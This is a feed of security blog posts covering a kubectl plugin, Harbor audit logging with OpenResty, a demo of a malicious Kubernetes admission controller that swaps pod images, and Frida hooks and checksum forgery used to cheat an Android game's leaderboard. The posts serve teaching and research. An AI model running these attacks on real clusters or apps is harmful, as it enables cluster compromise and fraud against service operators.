            downwardAPI    &lt;Object&gt;
               items    &lt;[]Object&gt;
                  fieldRef    &lt;Object&gt;
                     apiVersion    &lt;string&gt;
                     fieldPath    &lt;string&gt;
                  mode    &lt;integer&gt;
                  path    &lt;string&gt;
                  resourceFieldRef    &lt;Object&gt;
                     containerName    &lt;string&gt;
                     divisor    &lt;string&gt;
                     resource    &lt;string&gt;
            secret    &lt;Object&gt;
               items    &lt;[]Object&gt;
                  key    &lt;string&gt;
                  mode    &lt;integer&gt;
                  path    &lt;string&gt;
               name    &lt;string&gt;
               optional    &lt;boolean&gt;
            serviceAccountToken    &lt;Object&gt;
               audience    &lt;string&gt;
               expirationSeconds    &lt;integer&gt;
               path    &lt;string&gt;
      quobyte    &lt;Object&gt;
         group    &lt;string&gt;
         readOnly    &lt;boolean&gt;
         registry    &lt;string&gt;
         tenant    &lt;string&gt;
         user    &lt;string&gt;
         volume    &lt;string&gt;
      rbd    &lt;Object&gt;
         fsType    &lt;string&gt;
         image    &lt;string&gt;
         keyring    &lt;string&gt;
         monitors    &lt;[]string&gt;
         pool    &lt;string&gt;
         readOnly    &lt;boolean&gt;
         secretRef    &lt;Object&gt;
            name    &lt;string&gt;
         user    &lt;string&gt;
      scaleIO    &lt;Object&gt;
         fsType    &lt;string&gt;
         gateway    &lt;string&gt;
         protectionDomain    &lt;string&gt;
         readOnly    &lt;boolean&gt;
         secretRef    &lt;Object&gt;
            name    &lt;string&gt;
         sslEnabled    &lt;boolean&gt;
         storageMode    &lt;string&gt;
         storagePool    &lt;string&gt;
         system    &lt;string&gt;
         volumeName    &lt;string&gt;
      secret    &lt;Object&gt;
         defaultMode    &lt;integer&gt;
         items    &lt;[]Object&gt;
            key    &lt;string&gt;
            mode    &lt;integer&gt;
            path    &lt;string&gt;
         optional    &lt;boolean&gt;
         secretName    &lt;string&gt;
      storageos    &lt;Object&gt;
         fsType    &lt;string&gt;
         readOnly    &lt;boolean&gt;
         secretRef    &lt;Object&gt;
            name    &lt;string&gt;
         volumeName    &lt;string&gt;
         volumeNamespace    &lt;string&gt;
      vsphereVolume    &lt;Object&gt;
         fsType    &lt;string&gt;
         storagePolicyID    &lt;string&gt;
         storagePolicyName    &lt;string&gt;</code>
</details>

<p>This is a tedious job and consumes a lot of time. If there are multiple matching fields in different objects, that only makes the situation worse.</p>
<h3 id="heading-proposed-solution-kubectl-fields">Proposed solution: kubectl-fields</h3>
<p>I leveraged the <em>kubectl plugins</em> feature &amp; built a plugin to demonstrate an alternative solution &amp; approach to this problem.</p>
<p><code>kubectl explain --recursive | grep</code> doesn’t show the exact hierarchy of matched fields, but this plugin does! <code>kubectl fields</code> solves this problem by printing a one-liner parental hierarchy of any field in any selected resource.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1622198111500/Dzy4aKMo2.png" alt="kubectl-fields.png" /></p>
<pre><code class="lang-bash">$ kubectl fields po capabilities
spec.containers.securityContext.capabilities
spec.ephemeralContainers.securityContext.capabilities
spec.initContainers.securityContext.capabilities
</code></pre>
<pre><code class="lang-bash">$ kubectl fields po.spec securitycontext
containers.securityContext
ephemeralContainers.securityContext
initContainers.securityContext
securityContext
</code></pre>
<h3 id="heading-bonus">Bonus</h3>
<p><code>kubectl fields</code> is now integrated with  <a target="_blank" href="https://github.com/kubernetes-sigs/krew">krew</a>, a kubectl plugin manager. This plugin integration works on all platforms. So, this plugin can be installed directly with krew. It’s as simple as,</p>
<pre><code class="lang-bash">kubectl krew install fields
</code></pre>
<p>Huge thanks to <a target="_blank" href="https://twitter.com/ahmetb">ahmetb</a> for the krew integration suggestion.</p>
<p><strong>References</strong></p>
<p> <a target="_blank" href="https://github.com/rewanthtammana/kubectl-fields">https://github.com/rewanthtammana/kubectl-fields</a> </p>
]]></content:encoded></item><item><title><![CDATA[Enhancing the security audit logging of Harbor with OpenResty]]></title><description><![CDATA[TL;DR
In this blog post, we will be looking at some of the problems I have seen in Harbor private registry security audit logging with some possible solutions to meet security standards and requirements and finally, how I achieved the goal by leverag...]]></description><link>https://blog.rewanthtammana.com/enhancing-the-security-audit-logging-of-harbor-with-openresty</link><guid isPermaLink="true">https://blog.rewanthtammana.com/enhancing-the-security-audit-logging-of-harbor-with-openresty</guid><category><![CDATA[automation]]></category><category><![CDATA[containers]]></category><category><![CDATA[Redis]]></category><category><![CDATA[Devops]]></category><dc:creator><![CDATA[Rewanth Tammana]]></dc:creator><pubDate>Fri, 27 Aug 2021 07:45:02 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1630148527145/Wz_hPg-Jr.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h3 id="heading-tldr">TL;DR</h3>
<p>In this blog post, we will be looking at some of the problems I have seen in Harbor private registry security audit logging with some possible solutions to meet security standards and requirements and finally, how I achieved the goal by leveraging the OpenResty scripting abilities to perform better security audit logging.</p>
<p>By the end of the blog post, you can leverage security audit logging for Harbor private registry to achieve security compliance requirements for your container registry environments in Harbor.</p>
<h3 id="heading-what-is-harbor">What is Harbor?</h3>
<p>Before we deep dive into the problems and solutions, let’s sneak into Harbor and how companies use it.</p>
<blockquote>
<p>Harbor is an open-source registry that secures artifacts with policies and role-based access control, ensures images are scanned and free from vulnerabilities, and signs images as trusted. Harbor, a CNCF Graduated project, delivers compliance, performance, and interoperability to help you consistently and securely manage artifacts across cloud-native compute platforms like Kubernetes and Docker.
— https://goharbor.io/</p>
</blockquote>
<h3 id="heading-problems-we-have-with-harbor-the-why">Problems we have with Harbor  — The Why?</h3>
<p>I think Harbor is a great open source project and it already helps to solve most of the problems in the work I do, but when it comes to the Security Standards and requirements of compliance, it doesn't have a mechanism to perform audit logging functionality. As most of the compliance standards want to have visibility and audit tracing to understand who did what, when, and how? We want similar visibility in the Harbor that can explain who accessed the registry, modified scan settings, tagged images, etc.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1629644406463/_CYiwCsvc.png" alt="Harbor-default-logging.png" /></p>
<blockquote>
<p>The current logs don't explain who &amp; what's being modified. It's a huge setback &amp; game stopper.</p>
</blockquote>
<p>As container registry is one of the most key aspects of the whole supply chain security, it becomes even more critical to have an understanding of what’s happening by leveraging visibility and proactive monitoring.</p>
<h3 id="heading-here-are-some-possible-solutions-i-came-up-with">Here are some possible solutions I came up with</h3>
<p>As I have a clear problem statement, I have started tinkering with existing solutions and possible solutions to solve this. So here are some of the possible things I can do to solve this problem includes,</p>
<ul>
<li>Adding the custom middleware to the harbor-core to implement custom security audit logging to enable required</li>
<li>Customize Harbor codebase to add new logging modules at different Microservice level</li>
<li>Add customized event controllers to Harbor for logging</li>
</ul>
<h3 id="heading-current-workflow">Current workflow</h3>
<p>Harbor spins up 11+ microservices on start-up. Nginx acts as a reverse proxy &amp; forwards the requests to respective components. All the logging happens at the Nginx level.</p>
<ul>
<li>Step 0: User request comes &amp; audit logging happens at Nginx</li>
<li>Step 1: Request goes to Harbor core MS from Nginx MS</li>
<li>Step 2: Harbor core MS communicates with serialized Redis for authentication checks</li>
<li>Step 3: Harbor core MS validates the authentication</li>
<li>Step 4: Harbor core MS connects with Harbor DB (Postgres) for authorization checks</li>
<li>Step 5: Harbor core MS validates the authorization</li>
<li>Step 6: Rest of the magic happens!</li>
</ul>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1629466236081/DD2wuKbM2.png" alt="rewanthtammana-Harbor-default-flow.png" /></p>
<h4 id="heading-default-log-format-configuration">Default log format configuration</h4>
<pre><code class="lang-apacheconf">  <span class="hljs-attribute">log_format</span> timed_combined '$remote_addr - '
    '"$<span class="hljs-attribute">request</span><span class="hljs-string">" $status $body_bytes_sent '
    '"</span>$http_referer<span class="hljs-string">" "</span>$http_user_agent<span class="hljs-string">" '
    '$request_time $upstream_response_time $pipe';</span>
</code></pre>
<p>With the default configuration &amp; workflow, there's no way for Nginx to log the user information just from the HTTP requests. All the Authentication &amp; Authorization checks happen after the request passes the Nginx stage. To solve this problem, we need to fetch user information at the Nginx level.</p>
<h3 id="heading-solution-for-the-problem-i-have-chosen-the-how">Solution for the problem I have chosen  — The How?</h3>
<p>Here comes the exciting part, I kind of delved into pretty much all the possible solutions. But due to the constraints I have (time, smooth upgrades), I have chosen to go this way.</p>
<p>We will replace Nginx with Openresty, query the Redis key-store to fetch user information, pass it to the proxy, save it to the logs.</p>
<p>Some considerations I have to keep an eye for this solution include,</p>
<p>A slight increase in latency due to multiple calls at the proxy level. The latency won't be noticed until we have massive traffic.</p>
<h3 id="heading-solution-for-the-problem-technicalities">Solution for the problem —  Technicalities</h3>
<p>Though Nginx is a powerful software it lacks programming ability. We need to add programming capabilities to Nginx to communicate with Redis MS to fetch user information. To perform these operations, we have to replace Nginx with Openresty that is having Lua scripting abilities.</p>
<p>With Lua, we will be able to query Redis cache to retrieve the data, extract information from serialized data, store it in the logs at the reverse proxy level and forward the request ahead for the rest of the operations.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1629466401602/u6Gn1Fp4l.png" alt="rewanthtammana-Harbor-enhanced-flow.png" /></p>
<p>The enhanced workflow sequence:</p>
<ul>
<li>Step 1: At the Openresty level, we extract the cookies from the user request</li>
<li>Step 2: We extract the <code>sid</code> session identified from the cookies</li>
<li>Step 3: We fetch serialized data associated with <code>sid</code> from Redis key-value store</li>
<li>Step 4: Extract Email ID from the serialized data</li>
<li>Step 5: Add Email ID to rest of the logging parameters &amp; store it in reverse proxy logs</li>
<li>Step 6: Forward the initial user request to other MS to do the magic!</li>
</ul>
<h4 id="heading-enhanced-logging-configuration">Enhanced logging configuration</h4>
<p>Along with a bunch of other Lua codes, <a target="_blank" href="https://github.com/rewanthtammana/harbor-logging/blob/master/make/common/config/nginx-custom/lua/user.lua">here</a>, a considerable upgrade has been performed in the logging conf, <a target="_blank" href="https://github.com/rewanthtammana/harbor-logging/blob/master/make/common/config/nginx-custom/conf/nginx.conf">here</a></p>
<pre><code class="lang-apacheconf">  ...
  <span class="hljs-attribute">location</span> / {
    ...
    <span class="hljs-attribute">default_type</span> text/plain;
    <span class="hljs-attribute">access_by_lua_block</span> {
      <span class="hljs-attribute">local</span> user = require <span class="hljs-string">"user"</span>
      <span class="hljs-attribute">local</span> redis = require <span class="hljs-string">"resty.redis"</span>
      <span class="hljs-attribute">local</span> red = redis:new()

      <span class="hljs-attribute">ngx</span>.var.email=user.fetch(red, ngx.var.cookie_sid)
    }
  }
  ...
  <span class="hljs-attribute">log_format</span> timed_combined escape=none '($email) $remote_addr - '
  '"$<span class="hljs-attribute">request</span><span class="hljs-string">" $status $body_bytes_sent '
  '"</span>$http_referer<span class="hljs-string">" "</span>$http_user_agent<span class="hljs-string">" '
  '$request_time $upstream_response_time $pipe'
  '$request_body';</span>
</code></pre>
<blockquote>
<p>With the above-customized configuration changes, we can see the request body &amp; email ID of the user.</p>
</blockquote>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1629644556197/8ItDj2avW.png" alt="Harbor-enhanced-logging.png" /></p>
<h3 id="heading-the-long-why-i-didnt-choose-other-solutions">The long why I didn’t choose other solutions</h3>
<p>I want to have a solution that solves our problem &amp; also allows us to perform smooth updates. If we choose to tamper with the harbor code base, until our code gets merged with the main branch, we will face massive issues with upgrading the harbor to the latest version.</p>
<h3 id="heading-conclusionsummary">Conclusion/Summary</h3>
<p>I have tried to solve a problem existing since Harbor's inception by replacing Nginx proxy on Photon OS with Openresty, adding Lua scripting to make calls to serialized Redis cache to fetch information based on session id, decrypting serialized data, fetching user information, save it in the logs, and then forward the requests to Harbor-core microservice for the regular flow execution.</p>
<p><strong>NOTE:</strong> This solution is definitely not a production level fix &amp; this blog is to just demonstrate the things I tried &amp; learnt in the process of fixing the issue.</p>
<p><strong>Github - </strong> <a target="_blank" href="https://github.com/rewanthtammana/harbor-enhanced-logging">https://github.com/rewanthtammana/harbor-enhanced-logging</a></p>
]]></content:encoded></item><item><title><![CDATA[Creating Malicious Admission Controllers]]></title><description><![CDATA[Admission controllers play a crucial role in Kubernetes & are leveraged by multiple tools & teams to defend the clusters. A simple misconfiguration in the setup allows attackers to effortlessly leverage this defensive feature to perform offensive att...]]></description><link>https://blog.rewanthtammana.com/creating-malicious-admission-controllers</link><guid isPermaLink="true">https://blog.rewanthtammana.com/creating-malicious-admission-controllers</guid><category><![CDATA[Kubernetes]]></category><category><![CDATA[hacking]]></category><category><![CDATA[Security]]></category><category><![CDATA[containers]]></category><category><![CDATA[automation]]></category><dc:creator><![CDATA[Rewanth Tammana]]></dc:creator><pubDate>Mon, 09 Aug 2021 12:59:32 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1628434305471/vvSyjEXQxy.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Admission controllers play a crucial role in Kubernetes &amp; are leveraged by multiple tools &amp; teams to defend the clusters. A simple misconfiguration in the setup allows attackers to effortlessly leverage this defensive feature to perform offensive attacks. In this article, we will create a malicious admission controller, understand the technicalities, and analyze its impact.</p>
<p><a target="_blank" href="https://www.stackrox.com/">Stackrox</a> has done an amazing job of demonstrating the usage of admission controllers to defend the Kubernetes clusters. We will modify their code to demonstrate an offensive attack scenario.</p>
<h3 id="heading-introduction-to-admission-controllers">Introduction to admission controllers</h3>
<blockquote>
<p>An admission controller is a piece of code that intercepts requests to the Kubernetes API server before the persistence of the object, but after the request is authenticated and authorized. </p>
</blockquote>
<h3 id="heading-workflow-andamp-types-of-controllers">Workflow &amp; Types of controllers:</h3>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1628339222090/iyOrDsdV0.png" alt="image.png" /></p>
<ul>
<li>MutatingAdmissionWebhook (modifies the object if it desires)</li>
<li>ValidatingAdmissionWebhook (validates the object if it desires)</li>
</ul>
<p>If either of the controllers rejects the request, the entire request is rejected immediately and an error is returned to the end-user.</p>
<h3 id="heading-uses-of-admission-controller">Uses of admission controller</h3>
<p>Tools like OPA, Kyverno, and many others leverage admission controllers to enforce more security.</p>
<ul>
<li>Limit requests to create, delete, modify, and other specific operations</li>
<li>Allows enforcing granular rules</li>
<li>Highly effective in hardening Kubernetes clusters</li>
</ul>
<h3 id="heading-exploitation">Exploitation</h3>
<p>Admission controllers are built to defend the systems &amp; harden the infrastructure but a simple misconfiguration can lead to nightmares &amp; deadly attacks.</p>
<h3 id="heading-creating-malicious-admission-controller">Creating malicious admission controller</h3>
<p>Once an attacker gets into a misconfigured cluster, they can perform n number of operations. If the attacker has privileges to create a deployment, service &amp; mutating webhook admission controller, then it's pretty much game over. Hence, exploiting admission controllers can be categorized as part of a post-exploitation phase. </p>
<p>The source code of the demo is available, <a target="_blank" href="https://github.com/rewanthtammana/malicious-admission-controller-webhook-demo">here</a>.</p>
<pre><code class="lang-bash">git <span class="hljs-built_in">clone</span> https://github.com/rewanthtammana/malicious-admission-controller-webhook-demo
<span class="hljs-built_in">cd</span> malicious-admission-controller-webhook-demo
./deploy.sh
kubectl get po -n webhook-demo -w
</code></pre>
<p>Wait until the webhook server is ready. Check the status.</p>
<pre><code class="lang-bash">kubectl get mutatingwebhookconfigurations
kubectl get deploy,svc -n webhook-demo
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1628433436353/yHUvUWugR.png" alt="mutating-webhook-status-check.PNG" /></p>
<p>Once we have our malicious mutating webhook running, let's deploy a new pod.</p>
<pre><code class="lang-bash">kubectl run nginx --image nginx
kubectl get po -w
</code></pre>
<p>Wait again, until you see the change in pod status. Now, you can see <code>ErrImagePull</code> error. Check the image name with either of the queries.</p>
<pre><code class="lang-bash">kubectl get po nginx -o=jsonpath=<span class="hljs-string">'{.spec.containers[].image}{"\n"}'</span>
</code></pre>
<pre><code class="lang-bash">kubectl describe po nginx | grep <span class="hljs-string">"Image: "</span>
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1628433512073/leFXtgSzm.png" alt="malicious-admission-controller.PNG" /></p>
<p>As you can see in the above image, we tried running image <code>nginx</code> but the final executed image is <code>rewanthtammana/malicious-image</code>. What just happened!!?</p>
<h3 id="heading-technicalities">Technicalities</h3>
<p>We will unfold what just happened. The <code>./deploy.sh</code> script that you executed, created a mutating webhook admission controller. The below lines in the mutating webhook admission controller are responsible for the above results.</p>
<pre><code class="lang-golang">patches = <span class="hljs-built_in">append</span>(patches, patchOperation{
    Op:    <span class="hljs-string">"replace"</span>,
    Path:  <span class="hljs-string">"/spec/containers/0/image"</span>,
    Value: <span class="hljs-string">"rewanthtammana/malicious-image"</span>,
})
</code></pre>
<p>The above snippet replaces the first container image in every pod with <code>rewanthtammana/malicious-image</code>. </p>
<h3 id="heading-example-attack-scenario">Example attack scenario</h3>
<p>An attacker can perform various attacks. For instance,</p>
<ul>
<li>Run pods/deployments with privileged flags, high capabilities, etc.</li>
<li>Write a custom image, that throws reverse shell from all pods to attacker's personal machine.</li>
</ul>
<p>By combining the above two threat vectors, attackers can gain access to all worker nodes by getting reverse shells from pods running with high privileges.</p>
<h3 id="heading-conclusion">Conclusion</h3>
<p>If an attacker is able to create a mutating webhook admission controller, they will have access to perform privileged operations and it can be disastrous. Admission controllers are highly effective to perform validations on the resources getting created, harden the deployments, etc. A simple RBAC with the least privileges could have prevented this massive attack.</p>
<h3 id="heading-references">References</h3>
<ul>
<li><a target="_blank" href="https://github.com/rewanthtammana/malicious-admission-controller-webhook-demo">Code: Malicious admission controller</a></li>
<li><a target="_blank" href="https://kubernetes.io/docs/reference/access-authn-authz/admission-controllers/">Kubernetes Docs</a></li>
</ul>
]]></content:encoded></item><item><title><![CDATA[Minesweeper Hacked: How We Hacked An Android Game And Ranked First Globally]]></title><description><![CDATA[Minesweeper Hacked: How we hacked an Android game to top the global leaderboard without even playing the game.
Recently, we came across an Android game of Minesweeper. The game has been nicely developed and was fun to play. Although it was very tough...]]></description><link>https://blog.rewanthtammana.com/minesweeper-hacked-how-we-hacked-an-android-game-and-ranked-first-globally</link><guid isPermaLink="true">https://blog.rewanthtammana.com/minesweeper-hacked-how-we-hacked-an-android-game-and-ranked-first-globally</guid><category><![CDATA[Security]]></category><category><![CDATA[Android]]></category><category><![CDATA[Applications]]></category><category><![CDATA[hacking]]></category><category><![CDATA[Game Development]]></category><dc:creator><![CDATA[Rewanth Tammana]]></dc:creator><pubDate>Fri, 28 May 2021 10:06:45 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1622196397330/Vo-3D__Om.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h3 id="heading-minesweeper-hacked-how-we-hacked-an-android-game-to-top-the-global-leaderboard-without-even-playing-the-game"><strong>Minesweeper Hacked: How we hacked an Android game to top the global leaderboard without even playing the game.</strong></h3>
<p>Recently, we came across an Android game of Minesweeper. The game has been nicely developed and was fun to play. Although it was very tough to win the game and even tougher to be in top ranks on the leaderboard. That’s when it struck us, why not “play” with the game some other way and figure out ways to hack minesweeper. . So we started analyzing the game.</p>
<p><strong>What is Minesweeper game</strong></p>
<blockquote>
<p>Minesweeper has a very basic gameplay style. In its original form, mines are scattered throughout a board. This board is divided into cells, which have three states: uncovered, covered and flagged. A covered cell is blank and clickable, while an uncovered cell is exposed, either containing a number (the mines adjacent to it), or a mine. When a cell is uncovered by a player click, and if it bears a mine, the game ends. A flagged cell is similar to a covered one, in the way that mines are not triggered when a cell is flagged, and it is impossible to lose through the action of flagging a cell. However, flagging a cell implies that a player thinks there is a mine underneath, which causes the game to deduct an available mine from the display.</p>
<p>In order to win the game, players must logically deduce where mines exist through the use of the numbers given by uncovered cells. To win, all non-mine cells must be uncovered and all mine cells must be flagged. At this stage, the timer is stopped.</p>
<p>When a player left-clicks on a cell, the game will uncover it. If there are no mines adjacent to that particular cell, the mine will display a blank tile or a “0”, and all adjacent cells will automatically be uncovered. Right-clicking on a cell will flag it, causing a flag to appear on it. Note that flagged cells are still covered, and a player can click on it to uncover it, like a normal covered cell.</p>
</blockquote>
<p>Source:  <a target="_blank" href="https://en.wikipedia.org/wiki/Minesweeper_%28video_game%29">Wikipedia</a></p>
<hr /> 

<h3 id="heading-minesweeper-hacked-introduction"><strong>Minesweeper Hacked: Introduction</strong></h3>
<p>Initially, our goal was to win the game irrespective of the time required. During the analysis we found that it was possible to reverse engineer the application and change values of some of the functions and win the game. We were able to achieve this task using two different methods.</p>
<p>Our next goal was to top the global leaderboards of all the difficulty levels, i.e. Beginner, Easy, Intermediate and Expert. In order to do that, we started analysing the application dynamically and checked the network traffic between the application and the server it was communicating with. We analysed source code of the apk even further and tampered the request accordingly to top the global rankings for every difficulty level.</p>
<blockquote>
<p>Note: The name of the game has been redacted on purpose. The game has 1M+ downloads on play store.</p>
</blockquote>
<h3 id="heading-how-we-did-it">How we did it</h3>
<p>Find the package name of installed application and decompiling it</p>
<p>There are multiple ways to achieve this, whether with ADB or from playstore URL <code>https://play.google.com/store/apps/details?id=&lt;app package name&gt;</code></p>
<ol>
<li><p>To extract the APK from the device, we used the <strong>adb</strong> tool.</p>
<p> Connect the device to the computer and make sure debugging is enabled. Start adb server and pull the apk using the following command.</p>
<pre><code class="lang-bash"> adb pull $(adb shell pm path &lt;app package name&gt; | cut -d<span class="hljs-string">':'</span> -f2)
 mv base.apk game.apk
</code></pre>
</li>
<li><p>To decompile the application, we will use apkx tool.</p>
<p> <strong>apkx </strong> is a Python wrapper to popular free dex converters and Java decompilers. Extracts Java source code directly from the APK. Useful for experimenting with different converters/decompilers without having to worry about classpath settings and command line args.</p>
<pre><code class="lang-bash"> apkx game.apk
</code></pre>
</li>
</ol>
<p>Reference: Download apkx  <a target="_blank" href="https://github.com/b-mueller/apkx">here</a> </p>
<hr />

<p><strong>Different methods we hacked the application</strong></p>
<ul>
<li><strong>METHOD 1</strong>: Hook the application at run-time and toggle return value of GameActivity.finishgame function.</li>
<li><strong>METHOD 2</strong>: Hook the application at run-time and print game board from game.GameBoard function.</li>
<li><strong>METHOD 3</strong>: Hack the application by just sending a success message to server by tampering time required and the checksum.</li>
</ul>
<blockquote>
<p>Observation is the key to hack these kind of applications</p>
</blockquote>
<hr />

<h3 id="heading-tools-used">TOOLS USED</h3>
<p><strong>Method 1 &amp; 2:</strong> Frida</p>
<p><strong>Method 3:</strong> BurpSuite or Curl (command line utility on Linux OS)</p>
<hr />

<h3 id="heading-method-1">METHOD 1</h3>
<p>Observe what actions are performed when you click on a bomb. The following observations are helpful</p>
<ol>
<li>Game ends</li>
<li>Timer is stopped</li>
</ol>
<p>We look for functions that trigger these operations.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1622194998777/muabd6ofE.png" alt="Minesweeper-finish-game-snippet-hide.png" /></p>
<p><code>finishgame</code> function expects a boolean argument. Print the boolean argument to see what is passed into the function.</p>
<pre><code class="lang-javascript"><span class="hljs-built_in">setTimeout</span>(<span class="hljs-function"><span class="hljs-keyword">function</span>(<span class="hljs-params"></span>) </span>{
    Java.perform(<span class="hljs-function"><span class="hljs-keyword">function</span>(<span class="hljs-params"></span>) </span>{

        <span class="hljs-keyword">var</span> GameActivity = Java.use(<span class="hljs-string">"&lt;app package name&gt;.GameActivity"</span>);

        GameActivity.finishgame.implementation = <span class="hljs-function"><span class="hljs-keyword">function</span>(<span class="hljs-params">bl2</span>) </span>{
            <span class="hljs-built_in">console</span>.log(<span class="hljs-string">"&gt;&gt;&gt;&gt;&gt; Hacking minesweeper game: finsihgame return value = "</span>, bl2);
            <span class="hljs-built_in">this</span>.finishgame(bl2);
        }
    })
}, <span class="hljs-number">10</span>);
</code></pre>
<p>The below commands spawns a new process</p>
<pre><code class="lang-bash">frida -f &lt;app package name&gt; -U -l hook.js --no-pause
</code></pre>
<p>Now, observe what happens when a mine is clicked. A <code>false</code> value is passed to <code>finishgame</code> function.</p>
<p>Maybe that’s how it knows, we lost the game. Instead we will try to toggle the value of bl2 passed to the <code>finishgame</code> function.</p>
<pre><code class="lang-javascript"><span class="hljs-built_in">setTimeout</span>(<span class="hljs-function"><span class="hljs-keyword">function</span>(<span class="hljs-params"></span>) </span>{
    Java.perform(<span class="hljs-function"><span class="hljs-keyword">function</span>(<span class="hljs-params"></span>) </span>{

        <span class="hljs-keyword">var</span> GameActivity = Java.use(<span class="hljs-string">"&lt;app package name&gt;.GameActivity"</span>);

        GameActivity.finishgame.implementation = <span class="hljs-function"><span class="hljs-keyword">function</span>(<span class="hljs-params">bl2</span>) </span>{
            <span class="hljs-built_in">console</span>.log(<span class="hljs-string">"&gt;&gt;&gt;&gt;&gt; Hacking minesweeper game: finish game value = "</span>, bl2);
            <span class="hljs-built_in">this</span>.finishgame(<span class="hljs-literal">true</span>);
        }
    })
}, <span class="hljs-number">10</span>);
</code></pre>
<p>Execute the following command to start the application and hook Frida script</p>
<pre><code class="lang-bash">frida -f &lt;app package name&gt; -U -l hook.js --no-pause
</code></pre>
<p>We can see that we won the game when we click on the bomb, instead of losing the game.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1622195238527/AArTC-cvB.png" alt="POC-minesweeper-frida-01-hide.png" /></p>
<h3 id="heading-method-2">METHOD 2</h3>
<p>In the first method, we hooked the function that sends the message to finish game.</p>
<p>Now, we have to see where the bombs are located. Observe the decompiled java files to locate where the bombs are placed. We have to look for the function that places these bombs.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1622195275755/XevyFg06B.png" alt="Minesweeper-generate-game-board-hide.png" /></p>
<p>Open the game, start a new game and hook the above js script to existing process.</p>
<pre><code class="lang-javascript"><span class="hljs-keyword">var</span> game_board_instance;
<span class="hljs-built_in">console</span>.log(<span class="hljs-string">"&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; Init frida script"</span>);

<span class="hljs-built_in">setTimeout</span>(<span class="hljs-function"><span class="hljs-keyword">function</span>(<span class="hljs-params"></span>) </span>{
    Java.perform(<span class="hljs-function"><span class="hljs-keyword">function</span>(<span class="hljs-params"></span>) </span>{

        <span class="hljs-built_in">console</span>.log(<span class="hljs-string">"&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; Init Java perform module"</span>);

        Java.choose(<span class="hljs-string">"&lt;app package name&gt;.states.game.GameBoard"</span>, {
            <span class="hljs-string">"onMatch"</span>: <span class="hljs-function"><span class="hljs-keyword">function</span>(<span class="hljs-params">instance</span>) </span>{
                game_board_instance = instance;
                <span class="hljs-built_in">console</span>.log(<span class="hljs-string">"Captured game board instance"</span>);
            },
            <span class="hljs-string">"onComplete"</span>: <span class="hljs-function"><span class="hljs-keyword">function</span>(<span class="hljs-params"></span>) </span>{}
        });

        <span class="hljs-built_in">console</span>.log(<span class="hljs-string">"Height: "</span>, game_board_instance.height.value);
        <span class="hljs-built_in">console</span>.log(<span class="hljs-string">"Width: "</span>, game_board_instance.width.value);

        <span class="hljs-built_in">console</span>.log(<span class="hljs-string">"Extracting the game board sequence &gt;&gt;&gt;&gt;&gt;&gt;"</span>);

        <span class="hljs-keyword">for</span>(<span class="hljs-keyword">var</span> i=<span class="hljs-number">0</span>; i&lt;game_board_instance.height.value; i++) {
            <span class="hljs-keyword">var</span> horizontal_sequence = <span class="hljs-string">""</span>;
            <span class="hljs-keyword">for</span>(<span class="hljs-keyword">var</span> j=<span class="hljs-number">0</span>; j&lt;game_board_instance.width.value; j++) {
                horizontal_sequence = horizontal_sequence + <span class="hljs-string">" "</span> + game_board_instance.tiles.value[i][j];
            }
            <span class="hljs-built_in">console</span>.log(horizontal_sequence);
        }

    })
}, <span class="hljs-number">10</span>);
</code></pre>
<p>Run the following command to execute app and hook our Frida script</p>
<pre><code class="lang-bash">frida -U &lt;app package name&gt; -l hook.js --no-pause
</code></pre>
<p>We can see that the entire board is printed along with the pints. The value 9 is the bomb!</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1622195378627/6DvNqzldK.png" alt="POC-minesweeper-frida-02-hide.png" /></p>
<h3 id="heading-method-3">METHOD 3</h3>
<p>After we finish the game, there the application provides us with a global rank. These requests to the server can be intercepted with a proxy tool like BurpSuite.</p>
<p>Reference:  <a target="_blank" href="https://portswigger.net/support/configuring-an-android-device-to-work-with-burp">https://portswigger.net/support/configuring-an-android-device-to-work-with-burp</a> </p>
<blockquote>
<p>Note: The application had implemented SSL Pinning, which we were able to bypass using Objection. Since this is a blog showing how we hacked the app, we decided not to show how to bypass SSL pinning using Objection or Frida. We will write a new blog with step by step instructions on how to use Frida and Objection.</p>
</blockquote>
<p>Upon intercpeting the request we realised, simpleDbTime parameter contains the time we took to finsih the game. If we can intercept this request and send a fake simpleDbTime to the server, we win. But its not easy. When we did that the result isn’t persistent, our scores weren’t reflected in global scoreboard. We realised there is a checksum that validates the request.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1622195453486/3yezar0s5.png" alt="POC-minesweeper-burp-03-hide.png" /></p>
<p>We analyzed the code more and found the code corresponding to checksum.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1622195485376/P-tuJ_1UL.png" alt="POC-checksum-code.png" /></p>
<p>We can see the implementation of the checksum algorithm. Parameters like <code>itemName</code>, <code>deviceId</code> and <code>simpleDbTime</code> have been used with dot separated to calculate the <code>md5sum</code> of the request.</p>
<p>We computed the value of checksum locally that corresponds to our new <code>simpleDbTime</code> value by using the same logic as performed in application code above.</p>
<p>Let’s get MD5 checksum of the required parameters</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1622195536368/OCqzAtRLm.png" alt="POC-minesweeper-get-md5sum.png" /></p>
<p>We will now send request using Burp with tampered parameter values.</p>
